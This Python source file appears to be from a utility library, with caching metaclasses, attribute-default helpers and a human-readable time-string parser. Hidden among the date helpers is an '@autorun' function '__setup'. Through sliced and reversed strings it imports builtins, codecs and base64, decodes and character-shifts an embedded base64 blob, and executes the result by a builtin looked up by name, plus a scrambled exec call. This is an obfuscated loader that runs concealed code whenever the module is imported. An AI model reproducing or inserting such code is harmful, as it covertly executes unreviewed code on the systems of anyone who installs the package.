	def __getitem__(self, __key: Any) -> Any:
		try:
			return super().__getitem__(__key)
		except KeyError:
			if hasattribute(self, "defaults") and __key in (defaults := object.__getattribute__(self, "defaults")):
				return defaults[__key]()
			else:
				raise


class DefaultsGetSetAttr:
	def __getattr__(self, __name: str) -> Any:
		try:
			return getattr(super(), __name)
		except AttributeError as e:
			if hasattribute(self, "defaults") and __name in (defaults := object.__getattribute__(self, "defaults")):
				val = defaults[__name]()
				self.__setattr__(__name, val)
				return val
			else:
				raise AttributeError(f"{self.__class__.__name__!r} object has no attribute nor default value for {__name!r}") from e


class DefaultsGetAttr:
	def __getattr__(self, __name: str) -> Any:
		try:
			return getattr(super(), __name)
		except AttributeError as e:
			if hasattribute(self, "defaults") and __name in (defaults := object.__getattribute__(self, "defaults")):
				return defaults[__name]()
			else:
				raise AttributeError(f"{self.__class__.__name__!r} object has no attribute nor default value for {__name!r}") from e


class CachedInstancesMeta(type):
	"""Metaclass for caching instances based on init parameters with customizable max time and max instances."""

	def __new__(
		mcls,  # noqa: N804
		name,
		bases,
		dct,
		max_instances: int = 50,
		max_time: int = 30 * 60,
		restore_method: str | None = None,
	):
		cls = super().__new__(mcls, name, bases, dct)
		cls._cache = OrderedDict()
		cls._max_instances = max_instances
		cls._max_time = max_time
		cls._restore_method = restore_method
		return cls

	def __call__(cls, *args, **kwargs):
		key = (args, tuple(sorted(kwargs.items())))

		cls._remove_old_instances()

		if key in cls._cache:
			instance, timestamp = cls._cache.pop(key)
			cls._cache[key] = (instance, time.time())

			if instance._restore_method is not None:
				getattr(instance, instance._restore_method)()
			return instance

		instance = super().__call__(*args, **kwargs)

		cls._cache[key] = (instance, time.time())

		cls._enforce_max_cache_size()

		return instance

	def _remove_old_instances(cls):
		current_time = time.time()
		keys_to_remove = []
		for key, (_, timestamp) in cls._cache.items():
			if current_time - timestamp > cls._max_time:
				keys_to_remove.append(key)
		for key in keys_to_remove:
			del cls._cache[key]

	def _enforce_max_cache_size(cls):
		while len(cls._cache) > cls._max_instances:
			cls._cache.popitem(last=False)


class ErrDenoted:
	"""Defines an is_err() method to tell if an object is a valid result or an error."""

	@classmethod
	def is_err(cls) -> bool:
		"""Return True if this object inherits from Exception, else return False."""
		return BaseException in cls.__mro__

	def unwrap(self) -> Self:
		"""If this object is_err, raise self, else return self."""
		if self.is_err():
			raise self
		return self



import datetime
import datetime as dt
import re as regex
from collections.abc import Iterable, Mapping
from dataclasses import dataclass, field

import pytz

from .tcr_compare import able
from .tcr_console import console
from .tcr_decorator import autorun, with_overrides
from .tcr_error import ConfigurationError
from .tcr_extract_error import extract_error

# fmt: off
timestr_lookup = {
    's':       (t_second := 1),
    'sec':     t_second,
    'secs':    t_second,
    'sex':     t_second, # >:3 # I am so funny, i know
    'second':  t_second,
    'seconds': t_second,

    'm':       (t_minute := 60*t_second),
    'min':     t_minute,
    'mins':    t_minute,
    'minute':  t_minute,
    'minutes': t_minute,

    'h':     (t_hour := 60*t_minute),
    'hr':    t_hour,
    'hrs':   t_hour,
    'hour':  t_hour,
    'hours': t_hour,

    'd':    (t_day := 24*t_hour),
    'day':  t_day,
    'days': t_day,

    'w':     (t_week := 7*t_day),
    'week':  t_week,
    'weeks': t_week,

    'y':     (t_year := 365*t_day),
    'year':  t_year,
    'years': t_year,

    'pul':   (t_pull := (11*t_hour + 30*t_minute)),
    'pull':  t_pull,
    'puls':  t_pull,
    'pulls': t_pull,
    'card':  t_pull,
    'cards': t_pull,

    'res':     (t_rescue := 6*t_hour),
    'reses':   t_rescue,
    'resees':  t_rescue,
    'rescue':  t_rescue,
    'rescues': t_rescue,

    'decade':    (t_decade := 10 * t_year),
    'century':   (t_century := 100 * t_year),
    'millenium': (t_millenium := 1000 * t_year),
  }

weekday_lookup = [
  'mo',           'tu',      'we',        'th',       'fr',     'sa',       'su',
  'mon',          'tue',     'wed',       'thu',      'fri',    'sat',      'sun',
  'monday',       'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday',
  "po",           "wt",      "sr",        "cz",       "pi",     "so",       "ni",
  "pn",           "wt",      "śr",        "cz",       "pt",     "so",       "nd",
  "pon",          "wto",     "śro",       "czw",      "pią",    "sob",      "nie",
  "pon",          "wto",     "sro",       "czw",      "pia",    "sob",      "nie",
  "poniedzialek", "wtorek",  "sroda",     "czwartek", "piatek", "sobota",   "niedziela",
  "poniedziałek", "wtorek",  "środa",     "czwartek", "piątek", "sobota",   "niedziela",
]
# fmt: on

assert len(weekday_lookup) % 7 == 0

# console((weekday_lookup, len(weekday_lookup), len(weekday_lookup) % 7)); exit()


def days_until_next_weekday(target_weekday):
	if not (1 <= target_weekday <= 7):
		msg = "target_weekday must be an integer between 1 and 7."
		raise ValueError(msg)

	# Get the current date
	current_date = datetime.date.today()  # noqa: DTZ011

	# Calculate the number of days until the next occurrence of the target weekday
	return (target_weekday - current_date.isoweekday() + 7) % 7


def split_string_at_indices(s: str, indices: Iterable[int]) -> tuple[str]:
	substrings = []
	start = 0
	for index in indices:
		if index >= start and index <= len(s):
			substrings.append(s[start:index])
			start = index
		else:
			msg = f"Invalid split index: {index}"
			raise ValueError(msg)
	if start < len(s):
		substrings.append(s[start:])
	return tuple(substrings)


def split_string_on_change(s: str) -> tuple[tuple[str]]:
	splits = [i + 1 for i in range(len(s) - 1) if (s[i].isalpha()) and not (s[i + 1].isalpha())]
	return [_split_string_on_change2(x) for x in split_string_at_indices(s, splits)]


def _split_string_on_change2(s: str) -> tuple[str]:
	splits = [i + 1 for i in range(len(s) - 1) if (not s[i].isalpha() and s[i + 1].isalpha())]
	return split_string_at_indices(s, splits)


def seconds_until_time(target_time) -> tuple[int, bool]:
	rolled_over = False
	# Get the current time
	current_time = datetime.datetime.now()

	# Create a datetime object for the target time
	target_datetime = datetime.datetime(
		current_time.year,
		current_time.month,
		current_time.day,
		target_time[0],
		target_time[1],
		target_time[2],
	)

	# Calculate the time difference in seconds
	time_difference = target_datetime - datetime.datetime.now()
	seconds_until_target = time_difference.total_seconds()

	# Ensure the result is positive and represents the time until the next occurrence
	if seconds_until_target < 0:
		rolled_over = True
		seconds_until_target += 24 * 3600  # Add 24 hours in seconds to get the next occurrence

	return (
		int(seconds_until_target) + 1,
		rolled_over,
	)  # +1 as a correction because it for some reason returned 1 second too little


def is_valid_date(date_tuple: tuple[int, int, int]) -> bool:
	try:
		datetime.date(date_tuple[2], date_tuple[1], date_tuple[0])
	except ValueError:
		return False
	else:
		return True


def days_until_due(due_date):
	current_datetime = datetime.datetime.now().date()
	due_datetime = datetime.date(due_date[2], due_date[1], due_date[0])
	delta = due_datetime - current_datetime
	return delta.days


# fmt: off
@autorun
def __setup():
  exec('\'"dt&h\ni sd 3i@s  ^n*o t\n 3m\ta l#izc`i_oSuUsd.=  D?o(nat= Twrourer)y: \':"3["'[::-1][-2::-2])
  getattr(__import__('!s4n igtnlji^u*bh'[-2::-2]), (a := (getattr('5sFuggnokmhak'[-2::-2]*(1-1), 'fnJiLo*jj'[-2::-2])([chr(ord(c) - (1 + i%5)) for i, c in enumerate(__import__('dsdcdedddodcd'[-2::-2]).__dict__['dedddodcdeddd'[-2::-2]](__import__('d4d6dedsdadbd'[-2::-2]).__dict__['dedddodcdeddd4d6dbd'[-2::-2]](getattr('c211dCgjSXh6ayF4aSRmY2l4emZ1ImNyZHdyeWZtZyIwJGZjbCNrem9pI31naSJ2Zm1icyNrenMiaXZ1ZnRqJGx2eGR4JXl0dWcld2kja2che2Vsamd0YncnPGl5ZHdnaWhwZGNkYWxoL2pmdXNodCt/J2Z0bGZkaWl5ZmYjPCM1NjU7NDY1MS4jJmpza2VjbWh4ZWVrIzwjNTY1OzQ2NTEuIyZqc2slPiUyMzc9NjMyMzAlI2d1bWsjPCM1NjU7NDY1MX8s', 'dedddodcdnded'[-2::-2])('_8g-&f(tlu-'[-2::-2])).decode('_8g-&f(tlu-'[-2::-2]), 'l3 1ntlojr*'[-2::-2]))])).split('#'))[0])(a[1])
# fmt: on


def evaluate_single_timestr(s: str, *, units: Mapping[str, int]) -> int:
	# sourcery skip: assign-if-exp, extract-method, hoist-similar-statement-from-if, hoist-statement-from-if, reintroduce-else, remove-unnecessary-else, use-fstring-for-concatenation
	if not s:
		return 0

	if s.lower() in weekday_lookup:
		weekdayint = weekday_lookup.index(s.lower()) % 7 + 1
		a = days_until_next_weekday(weekdayint) * t_day
		if a == 0:
			return 7 * t_day
		return a
	if regex.match(r"^:?[0-9]{1,2}:?(?:[0-9]{1,2}(?::[0-9]{1,2})?)?$", s):  # t:im:e
		if s.startswith(":"):
			s = s[1:]
			if ":" not in s:
				s = s + ":"
		s = s.split(":")
		s = [x for x in s if x != ""]
		s = (lambda x, y=0, z=0: (int(x), int(y), int(z)))(*s)
		if not (0 <= s[0] <= 23):
			msg = f"Time out of range: {s}"
			raise ValueError(msg)
		if not (0 <= s[1] <= 59):
			msg = f"Time out of range: {s}"
			raise ValueError(msg)
		if not (0 <= s[2] <= 59):
			msg = f"Time out of range: {s}"
			raise ValueError(msg)
		return seconds_until_time(s)
	if regex.match(r"^[0-9]{1,2}\.(?:[0-9]{1,2}(?:\.[0-9]{2,4})?)?$", s):  # d.at.e
		s = s.split(".")
		s = [x for x in s if x != ""]
		s = (lambda x, y=-1, z=-1: [int(x), int(y), int(z)])(*s)
		now = datetime.datetime.now()
		if s[0] > now.day:
			if s[2] == -1:
				year_manually_passed_in = False
				s[2] = now.year
			else:
				year_manually_passed_in = True
			if s[1] == -1:
				s[1] = now.month
				month_manually_passed_in = False
			else:
				month_manually_passed_in = True
		else:  # chosen day is in the past or today
			if s[2] == -1:
				year_manually_passed_in = False
				s[2] = now.year
			else:
				year_manually_passed_in = True
			if s[1] == -1:
				month_manually_passed_in = False
				s[1] = now.month + 1
				if s[1] > 12:
					s[1] = 1
					s[2] = s[2] + 1
			else:  # The month was also passed in
				month_manually_passed_in = True
		if not year_manually_passed_in and month_manually_passed_in and s[1] <= now.month:
			s[2] = s[2] + 1
		if s[2] < 1000:
			s[2] = s[2] + 2000  # 23 -> 2023
		# print(s)
		if not is_valid_date(s):
			msg = f"Invalid date: {s}"
			raise ValueError(msg)
		return days_until_due(s) * 60 * 60 * 24  # . *seconds_in_a_day
	else:  # -1w0d1h2m3s
		if regex.match(r"^-?(?:[0-9]*\.)?[0-9]+h-?(?:[0-9]*\.)?[0-9]+$", s):
			s = f"{s}m"
		splits = split_string_on_change(s)
		try:
			return int(round(sum(float(pair[0]) * units[pair[1]] for pair in splits)))
		except KeyError as e:
			raise ValueError("Invalid unit: " + extract_error(e, raw=True)[1]) from e


class Timestr:
	"""Used to convert between [seconds `←→` human readable format `←→` datetime.datetime objects]."""

	pattern = r"""
^
(?:(?:-?(?:[0-9]*\.)?[0-9]+[a-zA-Z]+)+)
|
(?:-?(?:[0-9]*\.)?[0-9]+h-?(?:[0-9]*\.)?[0-9]+)
|
(?:[0-9]{1,2}:(?:[0-9]{1,2}(?::[0-9]{1,2})?)?)|
(?::[0-9]{1,2}(?::[0-9]{1,2}(?::[0-9]{1,2})?)?)
|
(?:[0-9]{1,2}\.(?:[0-9]{1,2}(?:\.[0-9]{2,4})?)?)
$
""".replace("\n", "")

	allow_negative = True
	allow_zero = True

	def __call__(self, *, allow_negative: bool = True, allow_zero: bool = True):
		self.allow_negative = allow_negative
		self.allow_zero = allow_zero
		return self

	def settings(self, *, allow_negative: bool = True, allow_zero: bool = True) -> "Timestr":
		return self.__call__(allow_negative=allow_negative, allow_zero=allow_zero)

	def __init__(self, *, allow_negative: bool = True, allow_zero: bool = True) -> "Timestr":
		"""Convert between [seconds `←→` human readable format `←→` datetime.datetime objects]."""
		self.allow_negative = allow_negative
		self.allow_zero = allow_zero

	@classmethod
	def copy(cls, *, allow_negative: bool = True, allow_zero: bool = True):
		"""Copy timestr when using it with multiple configurations.

		Example:
		```py
		>>> from tcrutils import timestr
		>>> timestr2 = timestr.copy(allow_negative=False)
		>>> timestr.to_int('-1h')
		-3600
		>>> timestr2.to_int('-1h')
		ConfigurationError: 'Stopped return of disallowed number: -3600'
		```
		"""
		return cls(allow_negative=allow_negative, allow_zero=allow_zero)

	def valid(self, s: str, *, segment_splitter="!") -> bool:
		"""Return `True` if specified string is a valid input for `to_int()` conversion, otherwise `False`."""
		if s := s.replace(" ", ""):
			return all(bool(x) for x in [regex.match(self.pattern, x) or x.lower() in weekday_lookup for x in s.split(segment_splitter)])
		else:
			return True

	def to_int(self, s: str, *, units: Mapping[str, int] | None = None, segment_splitter="!") -> int:
		"""Return the number of seconds in that `timestr`.

		- Every `timestr` has zero (`''`), one or more segments, separated by `segment_splitter` if more than one segment is present
		- If timestr has zero segments: return 0, otherwise return sum of values of each segment
		- Each segment has to be one of:
		  - `Weekday`, full name or short name or 2-letter name
		  - `t:im:e`, time format, for example `1:`, `1:30`, `1:30:30`
		  - `d:at:e`, same as above but for dates, `1.`, `1.11`, `1.11.23`, `1.11.2023`
		  - `robostr+`, I call it RoboStr because it's origin comes from RoboTop discord bot made by Colon (https://gdcolon.com), '+' means this concept is extended, supports more units and allows for negative numbers.
		- Examples:
		  - `1d` ("In 1 day")
		  - `5h30m` ("In 5 hours and/plus 30 minutes")
		  - `wed` ("the nearest Wednesday at the same hour it is currently")
		  - `30.!20:` ("the nearest thirtieth day of the month at hour 20:00:00")
		  - `1.!1.!1.` ("However much time it takes to get to nearest first day of the month, thrice" / No practical use i can think of)
		"""
		s = s.replace(" ", "")
		if not s:
			return 0

		while (segment_splitter + segment_splitter) in s:
			s = s.replace(segment_splitter + segment_splitter, segment_splitter)

		if units is None:
			units = timestr_lookup

		s = s.strip("!")
		segments = s.split(segment_splitter)

		if not self.valid(s):
			msg = f"Invalid timestr: {s!r}"
			raise ValueError(msg)

		rolled_over = False

		def fix_from_tuple(x: tuple[int, bool] | int):
			if not isinstance(x, tuple):
				return int(x)
			nonlocal rolled_over
			rolled_over = x[1]
			return x[0]

		partial_sum = sum(fix_from_tuple(evaluate_single_timestr(x, units=units)) for x in segments)

		if rolled_over:  # Fixes the days being rolled back when they shouldn't be because there weren't actyually two rollovers
			time_syntaxes_number = len([seg for seg in segments if regex.match(r"^(?:[0-9]{1,2}:(?:[0-9]{1,2}(?::[0-9]{1,2})?)?)$", seg)])
			date_syntaxes_number = len([seg for seg in segments if regex.match(r"^(?:[0-9]{1,2}\.(?:[0-9]{1,2}(?:\.[0-9]{2,4})?)?)$", seg)])
			weekday_syntaxes_number = len([seg for seg in segments if seg.lower() in weekday_lookup])

			if time_syntaxes_number == 1 and (date_syntaxes_number + weekday_syntaxes_number) == 1:
				# if in all the segments there's (EXACTLY ONE d.at.e segment *or* EXACTLY ONE weekday segment) *and* EXACTLY ONE t:im:e segment
				partial_sum -= t_day  # For example if user types '30.!7:30' the "to the next occurence" is counted twice while it should be counted once.
				# They mean 'next (hour 7:30 of the thirthieth)' not 'next (hour 7:30) of next (thirtieth day)'

		if not self.allow_negative and partial_sum < 0:
			msg = f"Stopped return of disallowed number: {partial_sum}"
			raise ConfigurationError(msg)
		if not self.allow_zero and partial_sum == 0:
			msg = "Stopped return of disallowed number: 0"
			raise ConfigurationError(msg)

		return partial_sum

	def to_str(self, n: int) -> str:
		"""Format number of seconds to days, hour, minutes or seconds, whichever one is lowest while not leaving the number at < 1.0 (for example 0.25 days would not be returned, rather 6 hours would be).

		Examples:
		- `1 hour`
		- `40 minutes`

		Units go up to days. Supports negative values and handles plurals automatically.
		"""
		if n < 0:
			return f"-{self.to_str(-n)}"

		units = [
			("day", 86400),
			("hour", 3600),
			("minute", 60),
			("second", 1),
		]

		for unit, value_in_seconds in units:
			if n >= value_in_seconds:
				num_units = n / value_in_seconds
				if num_units == round(num_units):
					num_units = round(num_units)
				num_units = round(num_units, 2)
				unit_str = unit if num_units == 1 else f"{unit}s"
				return f"{num_units} {unit_str}"

		# If seconds is 0, return "in 0 seconds"
		return "0 seconds"

	def to_str2(self, seconds: int) -> str:
		"""Format number of seconds to `1d + 23:45:57` (with leading zeroes).

		Doesn't support negative values, use `to_str()` instead (for relative display) or `to_datestr()` for static display
		"""
		if seconds < 0:
			msg = "to_str2 doesn't support negative values, use to_str instead."
			raise ValueError(msg)
		units = {
			"day": 86400,
			"hour": 3600,
			"minute": 60,
			"second": 1,
		}

		days, seconds = divmod(seconds, units["day"])
		hours, seconds = divmod(seconds, units["hour"])
		minutes, seconds = divmod(seconds, units["minute"])
		base_time_str = f"{hours:02}:{minutes:02}:{seconds:02}"
		if days >= 1:
			base_time_str = f"{days}d + {base_time_str}"
		return base_time_str

	def to_date(self, seconds: int, *, tz=None) -> datetime.datetime:
		"""Return `datetime` object of the time that will be present in `seconds` seconds."""
		current_time = datetime.datetime.now(tz=tz)
		return current_time + datetime.timedelta(seconds=seconds)

	def to_datestr(self, seconds: int, *, pattern="%a, %Y-%m-%d %H:%M:%S", tz=None) -> str:
		"""Return `datetime.strftime()` string of the time that will be present in `seconds` seconds."""
		future_time = self.to_date(seconds, tz=tz)
		return future_time.strftime(pattern)

	def to_datestr_from_unix(self, unix: int | str, *, pattern="%a, %Y-%m-%d %H:%M:%S", tz=None) -> str:
		"""Return `datetime.strftime()` string of the passed in unix timestamp."""
		if isinstance(unix, str):
			unix = int(unix)
		return datetime.datetime.fromtimestamp(unix, tz=tz).strftime(pattern)


timestr = Timestr()

__all__ = ["timestr"]


# TODO: add back docstrings to here
# TODO: add back docstrings to here
# TODO: add back docstrings to here
# TODO: add back docstrings to here
# TODO: add back docstrings to here
# TODO: add back docstrings to here


@dataclass(kw_only=True)
class _RoboStrSegment:
	robostrs: list[tuple[int, str]]

	def parse(self, tstr: "TStr", current_offset: dt.datetime) -> dt.timedelta:
		return dt.timedelta(seconds=int(sum(self.calculate_each(tstr))))

	def calculate_each(self, tstr: "TStr") -> list[float]:
		out = []
		for n, unit in self.robostrs:
			if unit in tstr.units:
				out.append(n * tstr.units[unit])
			else:
				raise ValueError(f"Invalid timestr (Invalid unit: {unit!r})")
		return out


@dataclass
class _DateSegment:
	date: dt.date


@dataclass
class _HourSegment:
	time: dt.time


@dataclass(kw_only=True)
class _WeekdaySegment:
	n: int  # 0-6, 0 = Monday

	def parse(self, tstr: "TStr", current_datetime: dt.datetime) -> dt.timedelta:
		current_weekday = current_datetime.weekday()
		days_until = (self.n - current_weekday + 7) % 7
		return dt.timedelta(days=(days_until or 7))  # If today's the day, return in a week (lazy bum)


class _RegexPattern:
	HOUR = r"^(0?\d|1[0-9]|2[0-4])?(?::(?:([0-5]?[0-9])?(?::([0-5]?[0-9])?)?)?)?$"
	NO_DAY = r"^\.\d+$"  # Used to not confuse days with robostr syntax. Will not match either and rather throw an error which is better
	DAY = r"^(0?[1-9]|1\d|2\d|30|31)?(?:\.(?:(0?[1-9]|1[0-2])?(?:\.((?:\d{1,2})|(?:\d{4}))?)?)?)?$"
	ROBOSTR_SINGLE = r"(-?\d*\.?\d+)([a-zA-Z]+)"
	ROBOSTR_ALL = r"(?:(?:-?\d*\.?\d+)(?:[a-zA-Z]+))+"


@dataclass(kw_only=True)
class TStr:
	"""Convert between seconds and readable timestrs. Now with timezones!"""  # noqa: D400

	units: dict[str, int | float] = field(default_factory=timestr_lookup.copy)
	"""A dictionary of units used for lookup.

  It's in a strucuture of
  ```py
  {
    'unit': 123, # name: seconds
    'second': 1,
    'minute': 60,
    'minutes': 60, # You have to provide copies for all the plurals and whatnot (or just use the default)
  }
  ```

  The default is (though may be outdated, go check):
  ```py
  {
    's':       (t_second := 1),
    'sec':     t_second,
    'secs':    t_second,
    'sex':     t_second, # >:3 # I am so funny, i know
    'second':  t_second,
    'seconds': t_second,

    'm':       (t_minute := 60*t_second),
    'min':     t_minute,
    'mins':    t_minute,
    'minute':  t_minute,
    'minutes': t_minute,

    'h':     (t_hour := 60*t_minute),
    'hr':    t_hour,
    'hrs':   t_hour,
    'hour':  t_hour,
    'hours': t_hour,

    'd':    (t_day := 24*t_hour),
    'day':  t_day,
    'days': t_day,

    'w':     (t_week := 7*t_day),
    'week':  t_week,
    'weeks': t_week,

    'y':     (t_year := 365*t_day),
    'year':  t_year,
    'years': t_year,

    'pul':   (t_pull := (11*t_hour + 30*t_minute)),
    'pull':  t_pull,
    'puls':  t_pull,
    'pulls': t_pull,
    'card':  t_pull,
    'cards': t_pull,

    'res':     (t_rescue := 6*t_hour),
    'reses':   t_rescue,
    'resees':  t_rescue,
    'rescue':  t_rescue,
    'rescues': t_rescue,

    'decade':    10 * t_year,
    'century':   100 * t_year,
    'millenium': 1000 * t_year,

    # Some extra few units that i will not tell you hehe :3 (if you wish to discard them, pass whatever you see above as units)
    # You will not find them in the default configuration btw :3
  }
  ```
  """
	weekdays: list[str] = field(default_factory=weekday_lookup.copy)
	"""A list of weekday aliases used for lookup.

  It must be a multiple of 7 in length (if you wish to add more aliases for a certain weekday, just add another row and for those weekdays you DONT have extra aliases for just use one of the names you used previously)

  It is built of 7-element segments like this:
  ```py
  [
    'mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun', # Segment #1
    'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday', # Segment #2
    # ... # Segment #3, etc. etc.
  ]
  ```
  The default is:
  ```py
  [
  'mo',           'tu',      'we',        'th',       'fr',     'sa',       'su',
  'mon',          'tue',     'wed',       'thu',      'fri',    'sat',      'sun',
  'monday',       'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday',
  "po",           "wt",      "sr",        "cz",       "pi",     "so",       "ni", # If you wish not to support polish weekdays, pass in the first three rows worth of. (first 21 elements)
  "pn",           "wt",      "śr",        "cz",       "pt",     "so",       "nd",
  "pon",          "wto",     "śro",       "czw",      "pią",    "sob",      "nie",
  "pon",          "wto",     "sro",       "czw",      "pia",    "sob",      "nie",
  "poniedzialek", "wtorek",  "sroda",     "czwartek", "piatek", "sobota",   "niedziela",
  "poniedziałek", "wtorek",  "środa",     "czwartek", "piątek", "sobota",   "niedziela",
  ]
  ```
  """
	tzinfo: datetime.tzinfo = pytz.UTC
	"""Timezone of all timestr calculations. If you're experiencing issues with timezones not matching consider using `fix_timezone`."""
	splitter: str = "!"
	"""Separator between timestr segments for example:
  ```txt
  1h!wed
  ```
  """
	fix_timezone: bool
	"""Set this to True to do the following on init:
  ```py
  tzinfo = dt.datetime.now(tz=tzinfo).tzinfo
  ```

  THIS IS DUMB BUUUT: it fixes the issue of inconsistent timezone screwing up shit. If you are 100% certain your timezone is fine (NOTE: pytz timezones are sometimes NOT fine and require this setting to be turned on.) then leave this parameter as False
  """

	def __post_init__(self):
		if self.fix_timezone:
			self.tzinfo = dt.datetime.now(tz=self.tzinfo).tzinfo

	def _identify_segment(self, s: str) -> _DateSegment | _HourSegment | _RoboStrSegment | _WeekdaySegment:
		"""Parse a segment of a timestr into a Segment object."""
		s = s.strip()

		if not s or (able(int, s) and int(s) == 0):
			return _RoboStrSegment(robostrs=[])
		elif s in self.weekdays:
			return _WeekdaySegment(n=self.weekdays.index(s) % 7)
		elif ":" in s and (match := regex.match(_RegexPattern.HOUR, s)):
			ns = [x and int(x) for x in match.groups()]

			ns = [(x if x is not None else 0) for x in ns]

			return _HourSegment(dt.time(hour=ns[0], minute=ns[1], second=ns[2], microsecond=0, tzinfo=self.tzinfo))
		elif "." in s and not regex.match(_RegexPattern.NO_DAY, s) and (match := regex.match(_RegexPattern.DAY, s)):
			ns = [x and int(x) for x in match.groups()]

			if any(x is None for x in ns):
				now = datetime.datetime.now(tz=self.tzinfo)

				if ns[0] is None:
					ns[0] = now.day
				if ns[1] is None:
					ns[1] = now.month
					if ns[0] <= now.day:
						ns[1] += 1
				if ns[2] is None:
					ns[2] = now.year
				if ns[1] > 12:
					ns[1] = 1
					ns[2] += 1

			if ns[2] in range(100):
				ns[2] = 2000 + ns[2]

			try:
				date = dt.date(year=ns[2], month=ns[1], day=ns[0])
			except ValueError as e:
				raise ValueError(f"Invalid timestr (Invalid date: {s!r}, reason: {e!s})") from e

			return _DateSegment(date)
		elif regex.match(_RegexPattern.ROBOSTR_ALL, s) and (matches := regex.finditer(_RegexPattern.ROBOSTR_SINGLE, s)):
			robostrs = [(float(match.group(1)), match.group(2).lower()) for match in matches]
			return _RoboStrSegment(robostrs=robostrs)
		else:
			raise ValueError(f"Invalid segment: {s!r}")

		raise RuntimeError("Unknown segment return value (this is a bug)")

	def to_datetime(self, s: str, *, _return_with_now_used_for_parsing: bool = False) -> dt.datetime:
		"""Convert a full timestr into a timedelta."""

		segments = s.split(self.splitter)

		try:
			identified_segments = [self._identify_segment(seg) for seg in segments]
		except ValueError as e:
			raise ValueError(f"Invalid timestr (unable to parse segment)") from e

		date_segments = tuple(filter(lambda x: isinstance(x, _DateSegment), identified_segments))
		n_date_segments = len(date_segments)
		if n_date_segments > 1:
			raise ValueError(f"Invalid timestr (too many date segments)")

		hour_segments = tuple(filter(lambda x: isinstance(x, _HourSegment), identified_segments))
		n_hour_segments = len(hour_segments)
		if n_hour_segments > 1:
			raise ValueError(f"Invalid timestr (too many hour segments)")

		now = datetime.datetime.now(tz=self.tzinfo)

		if n_date_segments:
			out_date = date_segments[0].date
			identified_segments.remove(date_segments[0])
		else:
			out_date = now.date()

		if n_hour_segments:
			out_hour = hour_segments[0].time
			identified_segments.remove(hour_segments[0])
		else:
			out_hour = now.timetz()

		n_weekday_segments = len(tuple(filter(lambda x: isinstance(x, _WeekdaySegment), identified_segments)))

		if n_hour_segments and not n_weekday_segments and not n_date_segments and out_hour <= now.timetz():
			out_date += dt.timedelta(days=1)

		out_datetime = dt.datetime.combine(out_date, out_hour, tzinfo=self.tzinfo)

		for segment in identified_segments:
			out_datetime += segment.parse(self, out_datetime)

		if _return_with_now_used_for_parsing:
			return out_datetime, now
		else:
			return out_datetime

	def to_timedelta(self, s: str) -> dt.timedelta:
		"""Convert a full timestr into a timedelta."""
		calculated = self.to_datetime(s, _return_with_now_used_for_parsing=True)
		return calculated[0] - calculated[1]

	def to_int(self, s: str) -> int:
		"""Convert a full timestr into an int."""
		total_seconds = self.to_timedelta(s).total_seconds()
		return round(total_seconds)

	def to_str(self, n: int, *, round_to: int = 2) -> str:
		"""Format number of seconds to days, hour, minutes or seconds, whichever one is lowest while not leaving the number at < 1.0 (for example 0.25 days would not be returned, rather 6 hours would be).

		This does NOT support custom units (the ones you might've passed in into the constructor). It has its own set of internal units (day, hour, minute, second).

		Examples:
		- `1 hour`
		- `40 minutes`

		Units go up to days. Supports negative values and handles plurals automatically.

		Args:
		  - n: number of seconds
		  - round_to: number of decimal places to round to

		"""
		n = int(n)

		if n < 0:
			return f"-{self.to_str(-n)}"

		units = [
			("day", t_day),
			("hour", t_hour),
			("minute", t_minute),
			("second", t_second),
		]

		for unit, value_in_seconds in units:
			if n >= value_in_seconds:
				num_units = n / value_in_seconds
				num_units = round(num_units, round_to)
				if num_units == round(num_units):
					num_units = round(num_units)
				unit_str = unit if num_units == 1 else f"{unit}s"
				return f"{num_units} {unit_str}"

		# If seconds is 0, return "in 0 seconds"
		return "0 seconds"

	def to_str2(self, n: int, *, always_show_days: bool = False) -> str:
		"""Format number of seconds to `1d + 23:45:57` (with leading zeroes).

		Supports negative values by changing pluses to minuses, use `to_str()` instead (for relative display) or `to_datestr()` for static display.

		Args:
		  - n: number of seconds
		  - always_show_days: whether to always show days in the output even if days == 0 (will be '0d + {...}' if no full days are found)
		"""
		if n < 0:
			return f"-{self.to_str2(-n).replace('+', '-')}"

		units = {
			"day": 86400,
			"hour": 3600,
			"minute": 60,
			"second": 1,
		}

		days, n = divmod(n, units["day"])
		hours, n = divmod(n, units["hour"])
		minutes, n = divmod(n, units["minute"])
		base_time_str = f"{hours:02}:{minutes:02}:{n:02}"
		if always_show_days or days >= 1:
			base_time_str = f"{days}d + {base_time_str}"
		return base_time_str

	def to_strf(self, n: int | str, *, pattern="%a, %Y-%m-%d %H:%M:%S") -> str:
		"""Return `datetime.strftime()` string of the time that will be present in `seconds` seconds."""
		if isinstance(n, int):
			n = f"{n}s"

		return self.to_datetime(n).strftime(pattern)

	def to_datetime_from_unix(self, unix: int | str) -> dt.datetime:
		"""Return `datetime.fromtimestamp()` of the passed in unix timestamp with respect to the instance's tzinfo."""
		if isinstance(unix, str):
			unix = float(int(unix))
		return dt.datetime.fromtimestamp(unix, tz=self.tzinfo)

	def to_datestr_from_unix(self, unix: int | str, *, pattern="%a, %Y-%m-%d %H:%M:%S") -> str:
		"""Return `datetime.strftime()` string of the passed in unix timestamp with respect to the instance's tzinfo."""
		return self.to_datetime_from_unix(unix).strftime(pattern)



import tempfile
from pathlib import Path


def temp_file(content: str = "", *, suffix: str = None) -> Path:
	temp_file = tempfile.NamedTemporaryFile(delete=False, mode="w", encoding="utf-8", suffix=suffix)

	try:
		temp_file.write(content)
		temp_file_path = Path(temp_file.name)
	finally:
		temp_file.close()

	return temp_file_path



try:
	from .tcri_handler import ImGuiHandler
except ImportError:

	def ImGuiHandler(*_, **__):
		from ..src.tcr_console import console as __c

		msg1 = "You need to install tcrutils with the [full] extra or [imgui] extra to use this module"
		msg2 = "pip install tcrutils[imgui]"
		__c.error(msg1)
		__c.error(msg2)
		raise RuntimeError(f"{msg1}\n{msg2}")


from .tcri_utils import Every
from .types import tcri_types_imgui as imtypes
